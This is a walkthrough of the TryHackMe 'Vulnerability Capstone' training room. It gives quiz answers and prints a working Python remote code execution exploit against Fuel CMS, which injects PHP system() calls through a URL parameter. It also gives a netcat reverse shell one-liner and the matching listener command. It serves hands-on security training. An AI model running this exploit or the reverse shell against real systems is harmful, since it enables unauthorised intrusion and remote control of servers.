The Vulnerability Capstone Room is the final room in a series of three room created by https://tryhackme.com/p/cmnatic to teach people about vulnerabilities in software.
The room is available at https://tryhackme.com/room/vulnerabilitycapstone
Start the machine and wait the required 3 minutes so that it is up and running.
Question 1 – What is the name of the application running on the vulnerable machine?
Question 1 Answer – Browse to the machine and the answer is on the front page
Question 2 – What is the version number of this application?
Question 2 Answer – Browse to the machine and the answer is on the front page
Question 3 – What is the number of the CVE that allows an attacker to remotely execute code on this application?
Question 3 Answer – Browse to https://www.exploit-db.com/ and search for the name and version of the application running. A hint is that it is CVE-2018-XXXXX
The exploit code is available from searchsploit on your local machine or on https://www.exploit-db.com but it needs to be modified to work correctly. As the original code expects Burp to be running as a proxy. You use the modified code below, just remember to change x.x.x.x to the room’s correct IP address:
import requests import urllib URL = "http://x.x.x.x/" def find_nth_overlapping(haystack, needle, n): start = haystack.find(needle) while start >= 0 and n > 1: start = haystack.find(needle, start+1) n -= 1 return start while 1: xxxx = input('cmd:') url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" r = requests.get(url) html = "<!DOCTYPE html>" htmlcharset = r.text.find(html) begin = r.text[0:20] dup = find_nth_overlapping(r.text,begin,2) print(r.text[0:dup])
This will now give you a very limited shell. You can run any user commands you want, however, they will need to included in quotation marks like this
You can create a reverse listener to get a slightly more usable shell using netcat. First, open another terminal on your machine and the following command:
nc -nvlp 4444
This creates a netcat listener, waiting for a connection on port 4444. You are free to change 4444 to whatever port you prefer.
Now, on the Vulnerability Capstone machine, run the command:
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"
This will run a shell for netcat to connect your machine and the waiting netcat listener. For more information about this command, you visit the PentestMoney Reverse Cheat Sheet page at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Now you have a much better shell.
Now simply change to the /home/ubuntu folder and look for the flag.txt file.
From there you have the flag and the room in complete.